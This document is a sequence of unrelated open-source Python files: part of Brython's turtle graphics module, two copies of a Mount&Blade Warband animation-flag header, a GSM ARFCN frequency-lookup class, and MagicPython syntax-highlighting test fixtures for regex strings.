        if self.filling() and len(self._fillpath) > 2:
            self.screen._drawpoly(self._fillpath, outline=self._pencolor,
                                  fill=self._fillcolor, )
        else:
            print("No path to fill.")
        self._fillpath = None
    def dot(self, size=None, color=None):
        """Draw a filled circle with diameter size, using color.
        """
        item = self.screen._dot((self._x, self._y), size, color=color)
    def _write(self, txt, align, font, color=None):
        """Performs the writing for write()
        """
        if color is None:
            color = self._pencolor
        self.screen._write((self._x, self._y), txt, align, font, color)
    def write(self, arg, align="left", font=("Arial", 8, "normal"), color=None):
        """Write text at the current turtle position.
        Arguments:
        arg -- info, which is to be written to the TurtleScreen; it will be
               converted to a string.
        align (optional) -- one of the strings "left", "center" or right"
        font (optional) -- a triple (fontname, fontsize, fonttype)
        """
        self._write(str(arg), align.lower(), font, color=color)
    def begin_poly(self):
        """Start recording the vertices of a polygon.
        """
        self._poly = [(self._x, self._y)]
        self._creatingPoly = True
    def end_poly(self):
        """Stop recording the vertices of a polygon.
        """
        self._creatingPoly = False
    def get_poly(self):
        """Return the lastly recorded polygon.
        """
        # check if there is any poly?
        if self._poly is not None:
            return tuple(self._poly)
    def getscreen(self):
        """Return the TurtleScreen object, the turtle is drawing on.
        """
        return self.screen
    def getturtle(self):
        """Return the Turtle object itself.
        Only reasonable use: as a function to return the 'anonymous turtle'
        """
        return self
    getpen = getturtle
    def _make_copy(self, name=None):
        '''makes a copy of the current svg turtle, but possibly using a
        different shape. This copy is then ready to be inserted
        into a canvas.'''
        if name is None:
            name = self.name
        # We recreate a copy of the existing turtle, possibly using a different
        # name/shape; we set the opacity to
        # 0 since there is no specific time associated with the creation of
        # such an object: we do not want to show it early.
        _turtle, rotation = self.screen.create_svg_turtle(self, name=name)
        _turtle.setAttribute("opacity", 0)
        _turtle.setAttribute("fill", self._fillcolor)
        _turtle.setAttribute("stroke", self._pencolor)
        # We use timed animations to get it with the proper location, orientation
        # and appear at the desired time.
        previous_end, new_frame_id = self.screen._new_frame()
        x, y = self.screen._convert_coordinates(self._x, self._y)
        _turtle <= svg.animateMotion(begin=previous_end, dur=_CFG["min_duration"],
                                     fill="remove")
        _turtle <= svg.animateMotion(Id=new_frame_id,
                                     From="%s,%s" % (x, y), to="%s,%s" % (x, y),
                                     dur=_CFG["min_duration"], begin=previous_end,
                                     fill="freeze")
        _turtle <= svg.animateTransform(attributeName="transform",
                                        type="rotate",
                                        From=(self._old_heading, 0, 0),
                                        to=(self._old_heading, 0, 0),
                                        begin=previous_end,
                                        dur=_CFG["min_duration"], fill="freeze")
        _turtle <= svg.animate(begin=previous_end,
                               dur=_CFG["min_duration"], fill="freeze",
                               attributeName="opacity", attributeType="XML",
                               From=0, to=1)
        return _turtle
    def stamp(self):
        '''draws a permanent copy of the turtle at its current location'''
        _turtle = self._make_copy(name=self.name)
        self.screen.canvas <= _turtle
    def clone(self):
        """Create and return a clone of the turtle.
        """
        n = Turtle(self.name)
        # Copy over the simple (immutable) attributes only; SVG elements and
        # containers must stay per-instance.
        attrs = vars(self)
        new_dict = {}
        for attr in attrs:
            if isinstance(getattr(self, attr), (int, str, float)):
                new_dict[attr] = getattr(self, attr)
        n.__dict__.update(**new_dict)
        # ensure that visible characteristics are consistent with settings
        if not n._shown:
            n._shown = True  # otherwise, hideturtle() would have no effect
            n.hideturtle()
        n.left(0)
        n.fd(0)
        n.color(n.color())
        return n
# CPython-compatible alias: a Pen is just a Turtle.
Pen = Turtle

def done():
    """Finalize the drawing and display the resulting animated scene."""
    Screen().show_scene()
show_scene = done
def replay_scene():
    """Replay the animation by removing the canvas and re-creating it."""
    canvas_id = _CFG["turtle_canvas_id"]
    existing = document[canvas_id] if canvas_id in document else None
    if existing is not None:
        # Drop the old canvas element so show_scene() builds a fresh one.
        existing.parentNode.removeChild(existing)
    show_scene()
def restart():
    "For Brython turtle: clears the existing drawing and canvas"
    # Restore the configuration to its initial (pristine) values.
    _CFG.update(_cfg_copy)
    Screen().reset()
    Turtle._pen = None
    # Remove the canvas element from the DOM (if present) so that the next
    # drawing starts from a completely fresh canvas.
    if (_CFG["turtle_canvas_id"] in document and
            document[_CFG["turtle_canvas_id"]] is not None):
        element = document[_CFG["turtle_canvas_id"]]
        element.parentNode.removeChild(element)
### Creating functions based
import inspect
def getmethparlist(ob):
    """Get strings describing the arguments for the given object.

    Returns a pair of strings representing function parameter lists
    including parenthesis.  The first string is suitable for use in a
    function definition and the second is suitable for use in a function
    call.  The "self" parameter is not included.
    """
    # Inspect the code object directly; drop the leading "self" parameter.
    args, varargs, varkw = inspect.getargs(ob.__code__)
    real_args = args[1:]
    call_args = list(real_args)
    # Right-align the defaults against the parameter list, then render each
    # definition-side parameter as "name" or "name=<repr of default>".
    defaults = ob.__defaults__ or []
    defaults = ["=%r" % (value,) for value in defaults]
    defaults = [""] * (len(real_args) - len(defaults)) + defaults
    def_args = [arg + dflt for arg, dflt in zip(real_args, defaults)]
    if varargs is not None:
        def_args.append("*" + varargs)
        call_args.append("*" + varargs)
    if varkw is not None:
        def_args.append("**" + varkw)
        call_args.append("**" + varkw)
    # (The original also initialized defText/callText to "" up front; that
    # assignment was dead code and has been removed.)
    return "(%s)" % ", ".join(def_args), "(%s)" % ", ".join(call_args)
# Names of Screen methods that are re-exported as module-level functions.
_tg_screen_functions = ['addshape', 'bgcolor', 'bgpic', 'bye',
'clearscreen', 'colormode', 'delay', 'exitonclick', 'getcanvas',
'getshapes', 'listen', 'mainloop', 'mode', 'numinput',
'onkey', 'onkeypress', 'onkeyrelease', 'onscreenclick', 'ontimer',
'register_shape', 'resetscreen', 'screensize', 'setup',
'setworldcoordinates', 'textinput', 'title', 'tracer', 'turtles', 'update',
'window_height', 'window_width']
# Names of Turtle methods that are re-exported as module-level functions.
_tg_turtle_functions = ['back', 'backward', 'begin_fill', 'begin_poly', 'bk',
'circle', 'clear', 'clearstamp', 'clearstamps', 'clone', 'color',
'degrees', 'distance', 'dot', 'down', 'end_fill', 'end_poly', 'fd',
'fillcolor', 'filling', 'forward', 'get_poly', 'getpen', 'getscreen', 'get_shapepoly',
'getturtle', 'goto', 'heading', 'hideturtle', 'home', 'ht', 'isdown',
'isvisible', 'left', 'lt', 'onclick', 'ondrag', 'onrelease', 'pd',
'pen', 'pencolor', 'pendown', 'pensize', 'penup', 'pos', 'position',
'pu', 'radians', 'right', 'reset', 'resizemode', 'rt',
'seth', 'setheading', 'setpos', 'setposition', 'settiltangle',
'setundobuffer', 'setx', 'sety', 'shape', 'shapesize', 'shapetransform', 'shearfactor', 'showturtle',
'speed', 'st', 'stamp', 'tilt', 'tiltangle', 'towards',
'turtlesize', 'undo', 'undobufferentries', 'up', 'width',
'write', 'xcor', 'ycor']
# Public API: all generated wrapper functions plus the main entry points.
__all__ = (_tg_screen_functions + _tg_turtle_functions +
['done', 'restart', 'replay_scene', 'Turtle', 'Screen'])
## The following mechanism makes all methods of RawTurtle and Turtle available
## as functions. So we can enhance, change, add, delete methods to these
## classes and do not need to change anything here.
__func_body = """\
def {name}{paramslist}:
if {obj} is None:
{obj} = {init}
return {obj}.{name}{argslist}
"""
def _make_global_funcs(functions, cls, obj, init):
for methodname in functions:
try:
method = getattr(cls, methodname)
except AttributeError:
print("methodname missing:", methodname)
continue
pl1, pl2 = getmethparlist(method)
defstr = __func_body.format(obj=obj, init=init, name=methodname,
paramslist=pl1, argslist=pl2)
exec(defstr, globals())
_make_global_funcs(_tg_turtle_functions, Turtle, 'Turtle._pen', 'Turtle()')
_make_global_funcs(_tg_screen_functions, Screen, 'Turtle.screen', 'Screen()')
| {
"repo_name": "jonathanverner/brython",
"path": "www/src/Lib/turtle.py",
"copies": "2",
"size": "53120",
"license": "bsd-3-clause",
"hash": 144373378408001470,
"line_mean": 35.4584763212,
"line_max": 109,
"alpha_frac": 0.5578878012,
"autogenerated": false,
"ratio": 3.971291866028708,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5529179667228709,
"avg_score": null,
"num_lines": null
} |
# Animation record flags (arf_*) — presumably for the Mount&Blade Warband
# module system (see file path); confirm semantics against the modding docs.
# arf_blend_in_N stores the value N+1 in the low byte: the blend-in amount
# for the animation (units not visible here — TODO confirm).
arf_blend_in_0 = 0x00000001
arf_blend_in_1 = 0x00000002
arf_blend_in_2 = 0x00000003
arf_blend_in_3 = 0x00000004
arf_blend_in_4 = 0x00000005
arf_blend_in_5 = 0x00000006
arf_blend_in_6 = 0x00000007
arf_blend_in_7 = 0x00000008
arf_blend_in_8 = 0x00000009
arf_blend_in_9 = 0x0000000a
arf_blend_in_10 = 0x0000000b
arf_blend_in_11 = 0x0000000c
arf_blend_in_12 = 0x0000000d
arf_blend_in_13 = 0x0000000e
arf_blend_in_14 = 0x0000000f
arf_blend_in_15 = 0x00000010
arf_blend_in_16 = 0x00000011
arf_blend_in_17 = 0x00000012
arf_blend_in_18 = 0x00000013
arf_blend_in_19 = 0x00000014
arf_blend_in_20 = 0x00000015
arf_blend_in_21 = 0x00000016
arf_blend_in_22 = 0x00000017
arf_blend_in_23 = 0x00000018
arf_blend_in_24 = 0x00000019
arf_blend_in_25 = 0x0000001a
arf_blend_in_26 = 0x0000001b
arf_blend_in_27 = 0x0000001c
arf_blend_in_28 = 0x0000001d
arf_blend_in_29 = 0x0000001e
arf_blend_in_30 = 0x0000001f
arf_blend_in_31 = 0x00000020
arf_blend_in_32 = 0x00000021
arf_blend_in_48 = 0x00000031
arf_blend_in_64 = 0x00000041
arf_blend_in_128 = 0x00000081
arf_blend_in_254 = 0x000000ff
# Sound and behaviour bit flags (combine with | on top of a blend-in value).
arf_make_walk_sound = 0x00000100
arf_make_custom_sound = 0x00000200
arf_two_handed_blade = 0x01000000
arf_lancer = 0x02000000
arf_stick_item_to_left_hand = 0x04000000
arf_cyclic = 0x10000000
arf_use_walk_progress = 0x20000000
arf_use_stand_progress = 0x40000000
arf_use_inv_walk_progress = 0x80000000
#-----------------------------------------
# Animation flags (amf_*): the low 12 bits form amf_priority_mask; bits
# 12-15 select one of the mutually exclusive rider-rotation modes; the
# higher bits are independent playback-control flags.
amf_priority_mask = 0x00000fff
amf_rider_rot_bow = 0x00001000
amf_rider_rot_throw = 0x00002000
amf_rider_rot_crossbow = 0x00003000
amf_rider_rot_pistol = 0x00004000
amf_rider_rot_overswing = 0x00005000
amf_rider_rot_thrust = 0x00006000
amf_rider_rot_swing_right = 0x00007000
amf_rider_rot_swing_left = 0x00008000
amf_rider_rot_couched_lance = 0x00009000
amf_rider_rot_shield = 0x0000a000
amf_rider_rot_defend = 0x0000b000
amf_start_instantly = 0x00010000
amf_use_cycle_period = 0x00100000
amf_use_weapon_speed = 0x00200000
amf_use_defend_speed = 0x00400000
amf_accurate_body = 0x00800000
amf_client_prediction = 0x01000000
amf_play = 0x02000000
amf_keep = 0x04000000
amf_restart = 0x08000000 # restart animation even if it is the current animation
amf_hide_weapon = 0x10000000
amf_client_owner_prediction = 0x20000000
amf_use_inertia = 0x40000000
amf_continue_to_next = 0x80000000
#-----------------------------------------
# Combined-animation flags (acf_*); the top 8 bits (acf_anim_length_mask)
# carry an animation length encoded by acf_anim_length() below.
acf_synch_with_horse = 0x00000001
acf_align_with_ground = 0x00000002
acf_enforce_lowerbody = 0x00000100
acf_enforce_rightside = 0x00000200
acf_enforce_all = 0x00000400
acf_parallels_for_look_slope = 0x00001000
acf_lock_camera = 0x00002000
acf_displace_position = 0x00004000
acf_ignore_slope = 0x00008000
acf_thrust = 0x00010000
acf_right_cut = 0x00020000
acf_left_cut = 0x00040000
acf_overswing = 0x00080000
acf_rot_vertical_mask = 0x00300000
acf_rot_vertical_bow = 0x00100000
acf_rot_vertical_sword = 0x00200000
acf_anim_length_mask = 0xff000000
acf_anim_length_bits = 24
def acf_anim_length(x):
    """Encode animation length *x* into the top-8-bit acf_anim_length field
    (shift into position, then truncate to the mask's width)."""
    return (x << acf_anim_length_bits) & acf_anim_length_mask
#------------------------------------------
# Do not edit these lines
def get_byte(f):
    """Map a float (nominally 0.0..1.0) to a byte value.

    Exactly 0.0 maps to 0; every other input is scaled by 255 and clamped
    into 1..255, so that any nonzero input stays nonzero.
    """
    if f == 0.0:
        return 0
    return min(255, max(1, int(f * 255.0)))
def pack2f(a, b):
    """Pack two floats into one int, one byte each: b in bits 8-15, a in 0-7."""
    return (get_byte(b) << 8) | get_byte(a)
def pack4f(a, b, c, d):
    """Pack four floats into one int, one byte each: d highest byte, a lowest."""
    packed = 0
    for shift, value in ((24, d), (16, c), (8, b), (0, a)):
        packed |= get_byte(value) << shift
    return packed
| {
"repo_name": "Sw4T/Warband-Development",
"path": "mb_warband_module_system_1166/Module_system 1.166/headers/header_animations.py",
"copies": "2",
"size": "4400",
"license": "mit",
"hash": -7104227487844999000,
"line_mean": 32.8461538462,
"line_max": 97,
"alpha_frac": 0.5579545455,
"autogenerated": false,
"ratio": 2.8223220012828736,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.924507499424922,
"avg_score": 0.027040310506730687,
"num_lines": 130
} |
# Animation record flags (arf_*) — presumably for the Mount&Blade Warband
# module system (see file path); confirm semantics against the modding docs.
# arf_blend_in_N stores the value N+1 in the low byte: the blend-in amount
# for the animation (units not visible here — TODO confirm).
arf_blend_in_0 = 0x00000001
arf_blend_in_1 = 0x00000002
arf_blend_in_2 = 0x00000003
arf_blend_in_3 = 0x00000004
arf_blend_in_4 = 0x00000005
arf_blend_in_5 = 0x00000006
arf_blend_in_6 = 0x00000007
arf_blend_in_7 = 0x00000008
arf_blend_in_8 = 0x00000009
arf_blend_in_9 = 0x0000000a
arf_blend_in_10 = 0x0000000b
arf_blend_in_11 = 0x0000000c
arf_blend_in_12 = 0x0000000d
arf_blend_in_13 = 0x0000000e
arf_blend_in_14 = 0x0000000f
arf_blend_in_15 = 0x00000010
arf_blend_in_16 = 0x00000011
arf_blend_in_17 = 0x00000012
arf_blend_in_18 = 0x00000013
arf_blend_in_19 = 0x00000014
arf_blend_in_20 = 0x00000015
arf_blend_in_21 = 0x00000016
arf_blend_in_22 = 0x00000017
arf_blend_in_23 = 0x00000018
arf_blend_in_24 = 0x00000019
arf_blend_in_25 = 0x0000001a
arf_blend_in_26 = 0x0000001b
arf_blend_in_27 = 0x0000001c
arf_blend_in_28 = 0x0000001d
arf_blend_in_29 = 0x0000001e
arf_blend_in_30 = 0x0000001f
arf_blend_in_31 = 0x00000020
arf_blend_in_32 = 0x00000021
arf_blend_in_48 = 0x00000031
arf_blend_in_64 = 0x00000041
arf_blend_in_128 = 0x00000081
arf_blend_in_254 = 0x000000ff
# Sound and behaviour bit flags (combine with | on top of a blend-in value).
arf_make_walk_sound = 0x00000100
arf_make_custom_sound = 0x00000200
arf_two_handed_blade = 0x01000000
arf_lancer = 0x02000000
arf_stick_item_to_left_hand = 0x04000000
arf_cyclic = 0x10000000
arf_use_walk_progress = 0x20000000
arf_use_stand_progress = 0x40000000
arf_use_inv_walk_progress = 0x80000000
#-----------------------------------------
# Animation flags (amf_*): the low 12 bits form amf_priority_mask; bits
# 12-15 select one of the mutually exclusive rider-rotation modes; the
# higher bits are independent playback-control flags.
amf_priority_mask = 0x00000fff
amf_rider_rot_bow = 0x00001000
amf_rider_rot_throw = 0x00002000
amf_rider_rot_crossbow = 0x00003000
amf_rider_rot_pistol = 0x00004000
amf_rider_rot_overswing = 0x00005000
amf_rider_rot_thrust = 0x00006000
amf_rider_rot_swing_right = 0x00007000
amf_rider_rot_swing_left = 0x00008000
amf_rider_rot_couched_lance = 0x00009000
amf_rider_rot_shield = 0x0000a000
amf_rider_rot_defend = 0x0000b000
amf_start_instantly = 0x00010000
amf_use_cycle_period = 0x00100000
amf_use_weapon_speed = 0x00200000
amf_use_defend_speed = 0x00400000
amf_accurate_body = 0x00800000
amf_client_prediction = 0x01000000
amf_play = 0x02000000
amf_keep = 0x04000000
amf_restart = 0x08000000 # restart animation even if it is the current animation
amf_hide_weapon = 0x10000000
amf_client_owner_prediction = 0x20000000
amf_use_inertia = 0x40000000
amf_continue_to_next = 0x80000000
#-----------------------------------------
# Combined-animation flags (acf_*); the top 8 bits (acf_anim_length_mask)
# carry an animation length encoded by acf_anim_length() below.
acf_synch_with_horse = 0x00000001
acf_align_with_ground = 0x00000002
acf_enforce_lowerbody = 0x00000100
acf_enforce_rightside = 0x00000200
acf_enforce_all = 0x00000400
acf_parallels_for_look_slope = 0x00001000
acf_lock_camera = 0x00002000
acf_displace_position = 0x00004000
acf_ignore_slope = 0x00008000
acf_thrust = 0x00010000
acf_right_cut = 0x00020000
acf_left_cut = 0x00040000
acf_overswing = 0x00080000
acf_rot_vertical_mask = 0x00300000
acf_rot_vertical_bow = 0x00100000
acf_rot_vertical_sword = 0x00200000
acf_anim_length_mask = 0xff000000
acf_anim_length_bits = 24
def acf_anim_length(x):
    """Encode animation length *x* into the top-8-bit acf_anim_length field
    (shift into position, then truncate to the mask's width)."""
    return (x << acf_anim_length_bits) & acf_anim_length_mask
#------------------------------------------
# Do not edit these lines
def get_byte(f):
    """Map a float (nominally 0.0..1.0) to a byte value.

    Exactly 0.0 maps to 0; every other input is scaled by 255 and clamped
    into 1..255, so that any nonzero input stays nonzero.
    """
    if f == 0.0:
        return 0
    return min(255, max(1, int(f * 255.0)))
def pack2f(a, b):
    """Pack two floats into one int, one byte each: b in bits 8-15, a in 0-7."""
    return (get_byte(b) << 8) | get_byte(a)
def pack4f(a, b, c, d):
    """Pack four floats into one int, one byte each: d highest byte, a lowest."""
    packed = 0
    for shift, value in ((24, d), (16, c), (8, b), (0, a)):
        packed |= get_byte(value) << shift
    return packed
| {
"repo_name": "Eleyvie/wreck",
"path": "integrated/headers/header_animations.py",
"copies": "1",
"size": "4530",
"license": "mit",
"hash": -4842254718544660000,
"line_mean": 32.8461538462,
"line_max": 97,
"alpha_frac": 0.5419426049,
"autogenerated": false,
"ratio": 2.7638804148871263,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3805823019787127,
"avg_score": null,
"num_lines": null
} |
"""ARFCN comparison logic."""
from . import arfcn_ref
class ArfcnComparator:
    """Translate GSM frequency ranges into ARFCN lists.

    On instantiation the reference table (currently GSM850 + PCS1900) is
    expanded into two lookup dicts, ``uplink_to_arfcn`` and
    ``downlink_to_arfcn``, mapping a frequency to its ARFCN.  Feed one of
    those to :meth:`get_arfcn_list_by_range`.  To support more bands,
    extend ``reference_list`` below.
    """

    def __init__(self):  # NOQA
        self.reference_list = arfcn_ref.GSM_850 + arfcn_ref.PCS_1900
        self.uplink_to_arfcn = self.get_up_to_arfcn()
        self.downlink_to_arfcn = self.get_down_to_arfcn()

    def get_up_to_arfcn(self):
        """Return a dict mapping uplink frequency -> ARFCN."""
        return {entry["uplink"]: entry["arfcn"]
                for entry in self.reference_list}

    def get_down_to_arfcn(self):
        """Return a dict mapping downlink frequency -> ARFCN."""
        return {entry["downlink"]: entry["arfcn"]
                for entry in self.reference_list}

    def arfcn_from_uplink_range(self, start, end):
        """Unlikely to ever be used."""
        matches = self.get_arfcn_list_by_range(self.uplink_to_arfcn,
                                               start, end)
        return sorted(matches)

    def arfcn_from_downlink_range(self, start, end):
        """Use this for getting ARFCN list by tower TX."""
        matches = self.get_arfcn_list_by_range(self.downlink_to_arfcn,
                                               start, end)
        return sorted(matches)

    @classmethod
    def get_arfcn_list_by_range(cls, reference, start, end):
        """Return the ARFCNs whose frequency lies strictly between start and end.

        The reference var should look like this:
        {frequency: arfcn, frequency: arfcn}
        """
        try:
            low = float(start)
            high = float(end)
        except ValueError:
            # Best-effort fallback: report and use an empty-ish (0, 1) range.
            msg = "Unable to set float from %s and %s" % (str(start), str(end))
            print(msg)
            low = float(0)
            high = float(1)
        return [arfcn for freq, arfcn in reference.items()
                if low < float(freq) < high]
| {
"repo_name": "sitch-io/feed_builder",
"path": "sitch/sitchlib/arfcn_comparator.py",
"copies": "1",
"size": "2589",
"license": "apache-2.0",
"hash": -7162268235586793000,
"line_mean": 35.9857142857,
"line_max": 79,
"alpha_frac": 0.5855542681,
"autogenerated": false,
"ratio": 3.7795620437956203,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.486511631189562,
"avg_score": null,
"num_lines": null
} |
a = rf'fo{{2}}'
a = r'fo{{2}}'
a = r'fo{2}'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
rf : source.python, storage.type.string.python, string.interpolated.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.interpolated.python, string.regexp.quoted.single.python
fo : source.python, string.interpolated.python, string.regexp.quoted.single.python
{{2}} : keyword.operator.quantifier.regexp, source.python, string.interpolated.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.interpolated.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
fo{ : source.python, string.regexp.quoted.single.python
{2} : keyword.operator.quantifier.regexp, source.python, string.regexp.quoted.single.python
} : source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
fo : source.python, string.regexp.quoted.single.python
{2} : keyword.operator.quantifier.regexp, source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/fregexp4.py",
"copies": "1",
"size": "2163",
"license": "mit",
"hash": -8715927094252129000,
"line_mean": 59.0833333333,
"line_max": 137,
"alpha_frac": 0.6680536292,
"autogenerated": false,
"ratio": 3.904332129963899,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.5072385759163899,
"avg_score": null,
"num_lines": null
} |
a = r'foo#not a comment'
a = r'''
(?x) # multi-line regexp
foo # comment
'''
a = R'''
(?x) # not a
foo # comment
'''
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
foo#not a comment : source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.multi.python
''' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.multi.python
: source.python, string.regexp.quoted.multi.python
(?x) : source.python, storage.modifier.flag.regexp, string.regexp.quoted.multi.python
: source.python, string.regexp.quoted.multi.python
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python, string.regexp.quoted.multi.python
multi-line regexp : comment.line.number-sign.python, source.python, string.regexp.quoted.multi.python
foo : source.python, string.regexp.quoted.multi.python
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python, string.regexp.quoted.multi.python
comment : comment.line.number-sign.python, source.python, string.regexp.quoted.multi.python
''' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.multi.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
R : source.python, storage.type.string.python, string.quoted.raw.multi.python
''' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.multi.python
(?x) # not a : source.python, string.quoted.raw.multi.python
foo # comment : source.python, string.quoted.raw.multi.python
''' : punctuation.definition.string.end.python, source.python, string.quoted.raw.multi.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/python5.py",
"copies": "1",
"size": "2539",
"license": "mit",
"hash": 4918201777474779000,
"line_mean": 56.7045454545,
"line_max": 136,
"alpha_frac": 0.6538007089,
"autogenerated": false,
"ratio": 3.91820987654321,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.507201058544321,
"avg_score": null,
"num_lines": null
} |
a = r'(<\' for
a = r"(<\" for
a = r'[<\' for
a = r"[<\" for
a = r'(?=\' for
a = r"(?=\" for
a = r'(?P<a>\' for
a = r"(?P<a>\" for
a = r'(?<!a\' for
a = r"(?<!a\" for
return some
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : punctuation.parenthesis.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
< : source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : punctuation.parenthesis.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
< : source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
[ : constant.other.set.regexp, meta.character.set.regexp, punctuation.character.set.begin.regexp, source.python, string.regexp.quoted.single.python
< : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
f : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
o : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
r : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
[ : constant.other.set.regexp, meta.character.set.regexp, punctuation.character.set.begin.regexp, source.python, string.regexp.quoted.single.python
< : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
f : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
o : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
r : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookahead.regexp, punctuation.parenthesis.lookahead.begin.regexp, source.python, string.regexp.quoted.single.python
?= : keyword.operator.lookahead.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookahead.regexp, punctuation.parenthesis.lookahead.begin.regexp, source.python, string.regexp.quoted.single.python
?= : keyword.operator.lookahead.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : meta.named.regexp, punctuation.parenthesis.named.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
?P<a> : entity.name.tag.named.group.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
for : meta.named.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : meta.named.regexp, punctuation.parenthesis.named.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
?P<a> : entity.name.tag.named.group.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
for : meta.named.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookbehind.negative.regexp, punctuation.parenthesis.lookbehind.begin.regexp, source.python, string.regexp.quoted.single.python
